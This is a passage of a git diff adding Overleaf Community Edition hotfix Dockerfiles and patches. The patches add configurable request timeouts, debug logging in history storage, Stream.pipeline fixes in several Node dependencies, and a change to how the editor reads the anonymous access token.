require('events') + const BPromise = require('bluebird') + const express = require('express') +@@ -47,9 +48,9 @@ app.use(cors()) + security.setupSSL(app) + security.setupBasicHttpAuthForSwaggerDocs(app) + ++const HTTP_REQUEST_TIMEOUT = parseInt(config.get('httpRequestTimeout'), 10) + app.use(function (req, res, next) { +- // use a 5 minute timeout on all responses +- res.setTimeout(5 * 60 * 1000) ++ res.setTimeout(HTTP_REQUEST_TIMEOUT) + next() + }) + +--- overleaf/services/history-v1/config/default.json ++++ overleaf/services/history-v1/config/default.json +@@ -25,5 +25,6 @@ + "maxFileUploadSize": "52428800", + "databasePoolMin": "2", + "databasePoolMax": "10", +- "httpsOnly": "false" ++ "httpsOnly": "false", ++ "httpRequestTimeout": "300000" + } +--- overleaf/services/project-history/app/js/HistoryStoreManager.js ++++ overleaf/services/project-history/app/js/HistoryStoreManager.js +@@ -17,7 +17,7 @@ import * as Errors from './Errors.js' + import * as LocalFileWriter from './LocalFileWriter.js' + import * as HashManager from './HashManager.js' + +-const HTTP_REQUEST_TIMEOUT = 300 * 1000 // 5 minutes ++const HTTP_REQUEST_TIMEOUT = Settings.apis.history_v1.requestTimeout + + /** + * Container for functions that need to be mocked in tests +--- overleaf/services/project-history/config/settings.defaults.cjs ++++ overleaf/services/project-history/config/settings.defaults.cjs +@@ -20,6 +20,9 @@ module.exports = { + filestore: { + url: `http://${process.env.FILESTORE_HOST || 'localhost'}:3009`, + }, ++ history_v1: { ++ requestTimeout: parseInt(process.env.V1_REQUEST_TIMEOUT || '300000', 10), ++ }, + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || 'localhost' +--- overleaf/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js ++++ overleaf/services/project-history/test/unit/js/HistoryStoreManager/HistoryStoreManagerTests.js +@@ -23,6 +23,7 @@ describe('HistoryStoreManager', function () { + filestore: { + url: 'http://filestore.sharelatex.production', + }, ++ history_v1: { requestTimeout: 123 }, + }, + } + this.latestChunkRequestArgs = sinon.match({ diff --git a/server-ce/hotfix/4.1.4/pr_15410.patch b/server-ce/hotfix/4.1.4/pr_15410.patch new file mode 100644 index 0000000..3fd7d45 --- /dev/null +++ b/server-ce/hotfix/4.1.4/pr_15410.patch @@ -0,0 +1,153 @@ +--- services/history-v1/api/controllers/projects.js ++++ services/history-v1/api/controllers/projects.js +@@ -194,18 +194,23 @@ async function getProjectBlob(req, res, next) { + const hash = req.swagger.params.hash.value + + const blobStore = new BlobStore(projectId) +- let stream ++ logger.debug({ projectId, hash }, 'getProjectBlob started') + try { +- stream = await blobStore.getStream(hash) +- } catch (err) { +- if (err instanceof Blob.NotFoundError) { +- return render.notFound(res) +- } else { +- throw err ++ let stream ++ try { ++ stream = await blobStore.getStream(hash) ++ } catch (err) { ++ if (err instanceof Blob.NotFoundError) { ++ return render.notFound(res) ++ } else { ++ throw err ++ } + } ++ res.set('Content-Type', 'application/octet-stream') ++ await pipeline(stream, res) ++ } finally { ++ logger.debug({ projectId, hash }, 'getProjectBlob finished') + } +- res.set('Content-Type', 'application/octet-stream') +- await pipeline(stream, res) + } + + async function getSnapshotAtVersion(projectId, version) { +--- services/history-v1/storage/lib/blob_store/index.js ++++ services/history-v1/storage/lib/blob_store/index.js +@@ -20,6 +20,7 @@ const projectKey = require('../project_key') + const streams = require('../streams') + const postgresBackend = require('./postgres') + const mongoBackend = require('./mongo') ++const logger = require('@overleaf/logger') + + const GLOBAL_BLOBS = new Map() + +@@ -34,9 +35,14 @@ function makeProjectKey(projectId, hash) { + async function uploadBlob(projectId, blob, stream) { + const bucket = config.get('blobStore.projectBucket') + const key = makeProjectKey(projectId, blob.getHash()) +- await persistor.sendStream(bucket, key, stream, { +- contentType: 'application/octet-stream', +- }) ++ logger.debug({ projectId, blob }, 'uploadBlob started') ++ try { ++ await persistor.sendStream(bucket, key, stream, { ++ contentType: 'application/octet-stream', ++ }) ++ } finally { ++ logger.debug({ projectId, blob }, 'uploadBlob finished') ++ } + } + + function getBlobLocation(projectId, hash) { +@@ -109,7 +115,12 @@ async function getStringLengthOfFile(byteLength, pathname) { + async function deleteBlobsInBucket(projectId) { + const bucket = config.get('blobStore.projectBucket') + const prefix = `${projectKey.format(projectId)}/` +- await persistor.deleteDirectory(bucket, prefix) ++ logger.debug({ projectId }, 'deleteBlobsInBucket started') ++ try { ++ await persistor.deleteDirectory(bucket, prefix) ++ } finally { ++ logger.debug({ projectId }, 'deleteBlobsInBucket finished') ++ } + } + + async function loadGlobalBlobs() { +@@ -202,9 +213,15 @@ class BlobStore { + async getString(hash) { + assert.blobHash(hash, 'bad hash') + +- const stream = await this.getStream(hash) +- const buffer = await streams.readStreamToBuffer(stream) +- return buffer.toString() ++ const projectId = this.projectId ++ logger.debug({ projectId, hash }, 'getString started') ++ try { ++ const stream = await this.getStream(hash) ++ const buffer = await streams.readStreamToBuffer(stream) ++ return buffer.toString() ++ } finally { ++ logger.debug({ projectId, hash }, 'getString finished') ++ } + } + + /** +--- services/history-v1/storage/lib/history_store.js ++++ services/history-v1/storage/lib/history_store.js +@@ -8,6 +8,7 @@ const path = require('path') + + const OError = require('@overleaf/o-error') + const objectPersistor = require('@overleaf/object-persistor') ++const logger = require('@overleaf/logger') + + const assert = require('./assert') + const persistor = require('./persistor') +@@ -70,6 +71,7 @@ HistoryStore.prototype.loadRaw = function historyStoreLoadRaw( + + const key = getKey(projectId, chunkId) + ++ logger.debug({ projectId, chunkId }, 'loadRaw started') + return BPromise.resolve() + .then(() => persistor.getObjectStream(BUCKET, key)) + .then(streams.gunzipStreamToBuffer) +@@ -80,6 +82,7 @@ HistoryStore.prototype.loadRaw = function historyStoreLoadRaw( + } + throw new HistoryStore.LoadError(projectId, chunkId).withCause(err) + }) ++ .finally(() => logger.debug({ projectId, chunkId }, 'loadRaw finished')) + } + + /** +@@ -102,6 +105,7 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + const key = getKey(projectId, chunkId) + const stream = streams.gzipStringToStream(JSON.stringify(rawHistory)) + ++ logger.debug({ projectId, chunkId }, 'storeRaw started') + return BPromise.resolve() + .then(() => + persistor.sendStream(BUCKET, key, stream, { +@@ -112,6 +116,7 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + .catch(err => { + throw new HistoryStore.StoreError(projectId, chunkId).withCause(err) + }) ++ .finally(() => logger.debug({ projectId, chunkId }, 'storeRaw finished')) + } + + /** +@@ -121,12 +126,13 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + * @return {Promise} + */ + HistoryStore.prototype.deleteChunks = function historyDeleteChunks(chunks) { ++ logger.debug({ chunks }, 'deleteChunks started') + return BPromise.all( + chunks.map(chunk => { + const key = getKey(chunk.projectId, chunk.chunkId) + return persistor.deleteObject(BUCKET, key) + }) +- ) ++ ).finally(() => logger.debug({ chunks }, 'deleteChunks finished')) + } + + module.exports = new HistoryStore() diff --git a/server-ce/hotfix/4.1.5/Dockerfile b/server-ce/hotfix/4.1.5/Dockerfile new file mode 100644 index 0000000..ca89588 --- /dev/null +++ b/server-ce/hotfix/4.1.5/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.1.4 + +# Patch: Change streaming compression in history-v1 +COPY pr_15445.patch . +RUN patch -p0 < pr_15445.patch diff --git a/server-ce/hotfix/4.1.5/pr_15445.patch b/server-ce/hotfix/4.1.5/pr_15445.patch new file mode 100644 index 0000000..1dcd18d --- /dev/null +++ b/server-ce/hotfix/4.1.5/pr_15445.patch @@ -0,0 +1,44 @@ +--- services/history-v1/storage/lib/history_store.js ++++ services/history-v1/storage/lib/history_store.js +@@ -103,11 +103,11 @@ HistoryStore.prototype.storeRaw = function historyStoreStoreRaw( + assert.object(rawHistory, 'bad rawHistory') + + const key = getKey(projectId, chunkId) +- const stream = streams.gzipStringToStream(JSON.stringify(rawHistory)) + + logger.debug({ projectId, chunkId }, 'storeRaw started') + return BPromise.resolve() +- .then(() => ++ .then(() => streams.gzipStringToStream(JSON.stringify(rawHistory))) ++ .then(stream => + persistor.sendStream(BUCKET, key, stream, { + contentType: 'application/json', + contentEncoding: 'gzip', +--- services/history-v1/storage/lib/streams.js ++++ services/history-v1/storage/lib/streams.js +@@ -79,8 +79,15 @@ function gunzipStreamToBuffer(readStream) { + exports.gunzipStreamToBuffer = gunzipStreamToBuffer + + function gzipStringToStream(string) { +- const gzip = zlib.createGzip() +- return new ReadableString(string).pipe(gzip) ++ return new BPromise(function (resolve, reject) { ++ zlib.gzip(Buffer.from(string), function (error, result) { ++ if (error) { ++ reject(error) ++ } else { ++ resolve(new ReadableString(result)) ++ } ++ }) ++ }) + } + + /** +@@ -88,6 +95,6 @@ function gzipStringToStream(string) { + * + * @function + * @param {string} string +- * @return {stream.Writable} ++ * @return {Promise.} + */ + exports.gzipStringToStream = gzipStringToStream diff --git a/server-ce/hotfix/4.1.6/Dockerfile b/server-ce/hotfix/4.1.6/Dockerfile new file mode 100644 index 0000000..33c19af --- /dev/null +++ b/server-ce/hotfix/4.1.6/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.1.5 + +# Adds missing dependency patches +ADD patches /overleaf/patches +RUN npm run postinstall diff --git a/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch new file mode 100644 index 0000000..bbf8a8f --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++retry-request+5.0.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +index a293298..df21af6 100644 +--- a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-const {PassThrough} = require('stream'); ++const { PassThrough, pipeline } = require('stream'); + const debug = require('debug')('retry-request'); + const extend = require('extend'); + +@@ -166,7 +166,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -232,7 +232,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. + if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', err => { + retryStream.destroy(err); + }); diff --git a/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch new file mode 100644 index 0000000..738eef5 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/@google-cloud+storage++teeny-request+8.0.2.patch @@ -0,0 +1,50 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +index a2251ca..e29e796 100644 +--- a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); +- // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ const requestStream = new stream_1.PassThrough(); ++ // // eslint-disable-next-line @typescript-eslint/no-explicit-any ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + (0, node_fetch_1.default)(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/server-ce/hotfix/4.1.6/patches/README.md b/server-ce/hotfix/4.1.6/patches/README.md new file mode 100644 index 0000000..c158e27 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/README.md @@ -0,0 +1 @@ +The patches in this folder are applied by `patch-package` to dependencies, particularly those which need changes that are difficult to apply upstream. diff --git a/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch b/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch new file mode 100644 index 0000000..b41d212 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/body-parser+1.20.1.patch @@ -0,0 +1,44 @@ +diff --git a/node_modules/body-parser/lib/read.js b/node_modules/body-parser/lib/read.js +index fce6283..6131c31 100644 +--- a/node_modules/body-parser/lib/read.js ++++ b/node_modules/body-parser/lib/read.js +@@ -18,7 +18,7 @@ var iconv = require('iconv-lite') + var onFinished = require('on-finished') + var unpipe = require('unpipe') + var zlib = require('zlib') +- ++var Stream = require('stream') + /** + * Module exports. + */ +@@ -166,25 +166,25 @@ function contentstream (req, debug, inflate) { + case 'deflate': + stream = zlib.createInflate() + debug('inflate body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'gzip': + stream = zlib.createGunzip() + debug('gunzip body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'identity': + stream = req + stream.length = length +- break ++ return req + default: + throw createError(415, 'unsupported content encoding "' + encoding + '"', { + encoding: encoding, + type: 'encoding.unsupported' + }) + } +- +- return stream ++ var pass = new Stream.PassThrough(); Stream.pipeline(req, stream, pass, () => {}) ++ return pass + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch b/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch new file mode 100644 index 0000000..a7e0db2 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/express++finalhandler+1.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/express/node_modules/finalhandler/index.js b/node_modules/express/node_modules/finalhandler/index.js +index f628e42..72f17d6 100644 +--- a/node_modules/express/node_modules/finalhandler/index.js ++++ b/node_modules/express/node_modules/finalhandler/index.js +@@ -125,7 +125,7 @@ function finalhandler (req, res, options) { + // cannot actually respond + if (headersSent(res)) { + debug('cannot %d after headers sent', status) +- req.socket.destroy() ++ if (req.socket) req.socket.destroy() + return + } + diff --git a/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch b/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch new file mode 100644 index 0000000..323c6ea --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/express++send+0.18.0.patch @@ -0,0 +1,57 @@ +diff --git a/node_modules/express/node_modules/send/index.js b/node_modules/express/node_modules/send/index.js +index 89afd7e..de56daf 100644 +--- a/node_modules/express/node_modules/send/index.js ++++ b/node_modules/express/node_modules/send/index.js +@@ -789,29 +789,29 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // cleanup +- function cleanup () { +- destroy(stream, true) +- } +- +- // response finished, cleanup +- onFinished(res, cleanup) +- +- // error handling +- stream.on('error', function onerror (err) { +- // clean up stream early +- cleanup() +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // cleanup ++ // function cleanup () { ++ // destroy(stream, true) ++ // } ++ // ++ // // response finished, cleanup ++ // onFinished(res, cleanup) ++ // ++ // // error handling ++ // stream.on('error', function onerror (err) { ++ // // clean up stream early ++ // cleanup() ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch b/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch new file mode 100644 index 0000000..74f7461 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/finalhandler+1.1.2.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/finalhandler/index.js b/node_modules/finalhandler/index.js +index 5673507..40f4684 100644 +--- a/node_modules/finalhandler/index.js ++++ b/node_modules/finalhandler/index.js +@@ -125,7 +125,7 @@ function finalhandler (req, res, options) { + // cannot actually respond + if (headersSent(res)) { + debug('cannot %d after headers sent', status) +- req.socket.destroy() ++ if (req.socket) req.socket.destroy() + return + } + diff --git a/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch b/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch new file mode 100644 index 0000000..7c13376 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/forwarded+0.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/forwarded/index.js b/node_modules/forwarded/index.js +index b2b6bdd..75e6254 100644 +--- a/node_modules/forwarded/index.js ++++ b/node_modules/forwarded/index.js +@@ -46,7 +46,7 @@ function forwarded (req) { + function getSocketAddr (req) { + return req.socket + ? req.socket.remoteAddress +- : req.connection.remoteAddress ++ : req.connection && req.connection.remoteAddress + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch b/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch new file mode 100644 index 0000000..d8bc681 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/ngcomponent+4.1.0.patch @@ -0,0 +1,9 @@ +diff --git a/node_modules/ngcomponent/index.ts b/node_modules/ngcomponent/index.ts +index 5fe33c5..8e1c6fc 100644 +--- a/node_modules/ngcomponent/index.ts ++++ b/node_modules/ngcomponent/index.ts +@@ -1,3 +1,4 @@ ++// @ts-nocheck + import { IChangesObject } from 'angular' + import assign = require('lodash/assign') + import mapValues = require('lodash/mapValues') diff --git a/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch b/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch new file mode 100644 index 0000000..8707726 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/node-fetch+2.6.7.patch @@ -0,0 +1,76 @@ +diff --git a/node_modules/node-fetch/lib/index.js b/node_modules/node-fetch/lib/index.js +index e5b04f1..8c80924 100644 +--- a/node_modules/node-fetch/lib/index.js ++++ b/node_modules/node-fetch/lib/index.js +@@ -545,8 +545,8 @@ function clone(instance) { + // tee instance body + p1 = new PassThrough(); + p2 = new PassThrough(); +- body.pipe(p1); +- body.pipe(p2); ++ Stream.pipeline(body, p1, () => {}); ++ Stream.pipeline(body, p2, () => {}); + // set instance body to teed body and return the other teed body + instance[INTERNALS].body = p1; + body = p2; +@@ -648,14 +648,14 @@ function writeToStream(dest, instance) { + // body is null + dest.end(); + } else if (isBlob(body)) { +- body.stream().pipe(dest); ++ Stream.pipeline(body.stream(), dest, () => {}); + } else if (Buffer.isBuffer(body)) { + // body is buffer + dest.write(body); + dest.end(); + } else { + // body is stream +- body.pipe(dest); ++ Stream.pipeline(body, dest, () => {}); + } + } + +@@ -1594,7 +1594,7 @@ function fetch(url, opts) { + res.once('end', function () { + if (signal) signal.removeEventListener('abort', abortAndFinalize); + }); +- let body = res.pipe(new PassThrough$1()); ++ let body = new PassThrough$1(); setTimeout(() => Stream.pipeline(res, body, (err) => { if (err) req.abort() }), 0); // Note: let the call-site attach event handler to "body" before we start streaming. + + const response_options = { + url: request.url, +@@ -1635,7 +1635,7 @@ function fetch(url, opts) { + + // for gzip + if (codings == 'gzip' || codings == 'x-gzip') { +- body = body.pipe(zlib.createGunzip(zlibOptions)); ++ const bodyGzip = zlib.createGunzip(zlibOptions); Stream.pipeline(body, bodyGzip, () => {}); body = bodyGzip; + response = new Response(body, response_options); + resolve(response); + return; +@@ -1645,13 +1645,13 @@ function fetch(url, opts) { + if (codings == 'deflate' || codings == 'x-deflate') { + // handle the infamous raw deflate response from old servers + // a hack for old IIS and Apache servers +- const raw = res.pipe(new PassThrough$1()); ++ const raw = new PassThrough$1(); setTimeout(() => Stream.pipeline(res, raw, () => {}), 0); // Note: delay piping into "raw" until we start piping into "body". + raw.once('data', function (chunk) { + // see http://stackoverflow.com/questions/37519828 + if ((chunk[0] & 0x0F) === 0x08) { +- body = body.pipe(zlib.createInflate()); ++ const bodyDeflate = zlib.createInflate(); Stream.pipeline(body, bodyDeflate, () => {}); body = bodyDeflate; + } else { +- body = body.pipe(zlib.createInflateRaw()); ++ const bodyDeflate = zlib.createInflateRaw(); Stream.pipeline(body, bodyDeflate, () => {}); body = bodyDeflate; + } + response = new Response(body, response_options); + resolve(response); +@@ -1661,7 +1661,7 @@ function fetch(url, opts) { + + // for br + if (codings == 'br' && typeof zlib.createBrotliDecompress === 'function') { +- body = body.pipe(zlib.createBrotliDecompress()); ++ const bodyBrotli = zlib.createBrotliDecompress(); Stream.pipeline(body, bodyBrotli, () => {}); body = bodyBrotli; + response = new Response(body, response_options); + resolve(response); + return; diff --git a/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch b/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch new file mode 100644 index 0000000..25a571b --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/passport-oauth2+1.6.1.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/passport-oauth2/lib/utils.js b/node_modules/passport-oauth2/lib/utils.js +index 486f9e1..4584507 100644 +--- a/node_modules/passport-oauth2/lib/utils.js ++++ b/node_modules/passport-oauth2/lib/utils.js +@@ -24,7 +24,7 @@ exports.originalURL = function(req, options) { + var trustProxy = options.proxy; + + var proto = (req.headers['x-forwarded-proto'] || '').toLowerCase() +- , tls = req.connection.encrypted || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) ++ , tls = (req.connection && req.connection.encrypted) || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) + , host = (trustProxy && req.headers['x-forwarded-host']) || req.headers.host + , protocol = tls ? 'https' : 'http' + , path = req.url || ''; diff --git a/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch b/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch new file mode 100644 index 0000000..afcf627 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/react2angular+4.0.6.patch @@ -0,0 +1,9 @@ +diff --git a/node_modules/react2angular/index.tsx b/node_modules/react2angular/index.tsx +index 5cee831..a07e040 100644 +--- a/node_modules/react2angular/index.tsx ++++ b/node_modules/react2angular/index.tsx +@@ -1,3 +1,4 @@ ++// @ts-nocheck + import { IAugmentedJQuery, IComponentOptions } from 'angular' + import fromPairs = require('lodash.frompairs') + import NgComponent from 'ngcomponent' diff --git a/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch b/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch new file mode 100644 index 0000000..f3096b5 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/retry-request+4.2.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/retry-request/index.js b/node_modules/retry-request/index.js +index 6cd6f65..39efb89 100644 +--- a/node_modules/retry-request/index.js ++++ b/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-var { PassThrough } = require('stream'); ++var { PassThrough, pipeline } = require('stream'); + var debug = require('debug')('retry-request'); + var extend = require('extend'); + +@@ -164,7 +164,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -220,7 +220,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. + if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', function (err) { + retryStream.destroy(err); + }); diff --git a/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch b/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch new file mode 100644 index 0000000..1c0b779 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/send+0.17.2.patch @@ -0,0 +1,61 @@ +diff --git a/node_modules/send/index.js b/node_modules/send/index.js +index 06d7507..8854216 100644 +--- a/node_modules/send/index.js ++++ b/node_modules/send/index.js +@@ -795,31 +795,31 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // response finished, done with the fd +- onFinished(res, function onfinished () { +- finished = true +- destroy(stream) +- }) +- +- // error handling code-smell +- stream.on('error', function onerror (err) { +- // request already finished +- if (finished) return +- +- // clean up stream +- finished = true +- destroy(stream) +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // response finished, done with the fd ++ // onFinished(res, function onfinished () { ++ // finished = true ++ // destroy(stream) ++ // }) ++ // ++ // // error handling code-smell ++ // stream.on('error', function onerror (err) { ++ // // request already finished ++ // if (finished) return ++ // ++ // // clean up stream ++ // finished = true ++ // destroy(stream) ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch b/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch new file mode 100644 index 0000000..213ed04 --- /dev/null +++ b/server-ce/hotfix/4.1.6/patches/teeny-request+7.1.3.patch @@ -0,0 +1,49 @@ +diff --git a/node_modules/teeny-request/build/src/index.js b/node_modules/teeny-request/build/src/index.js +index f209888..e9fe982 100644 +--- a/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); ++ const requestStream = new stream_1.PassThrough(); + // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + node_fetch_1.default(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/server-ce/hotfix/4.2.1/Dockerfile b/server-ce/hotfix/4.2.1/Dockerfile new file mode 100644 index 0000000..2f956e7 --- /dev/null +++ b/server-ce/hotfix/4.2.1/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.2.0 diff --git a/server-ce/hotfix/4.2.2/Dockerfile b/server-ce/hotfix/4.2.2/Dockerfile new file mode 100644 index 0000000..4af80fa --- /dev/null +++ b/server-ce/hotfix/4.2.2/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.2.1 + +# Patch: https://github.com/overleaf/internal/pull/16956 +COPY pr_16956.patch . +RUN patch -p0 < pr_16956.patch diff --git a/server-ce/hotfix/4.2.2/pr_16956.patch b/server-ce/hotfix/4.2.2/pr_16956.patch new file mode 100644 index 0000000..884f2a6 --- /dev/null +++ b/server-ce/hotfix/4.2.2/pr_16956.patch @@ -0,0 +1,34 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -8,7 +8,6 @@ const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') + const CollaboratorsInviteHandler = require('../Collaborators/CollaboratorsInviteHandler') + const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') + const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +-const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + const SessionManager = require('../Authentication/SessionManager') + const Errors = require('../Errors/Errors') + const DocstoreManager = require('../Docstore/DocstoreManager') +@@ -178,7 +177,7 @@ async function _buildJoinProjectView(req, projectId, userId) { + await CollaboratorsGetter.promises.getInvitedMembersWithPrivilegeLevels( + projectId + ) +- const token = TokenAccessHandler.getRequestToken(req, projectId) ++ const token = req.headers['x-sl-anonymous-access-token'] + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -213,10 +213,9 @@ const TokenAccessHandler = { + + 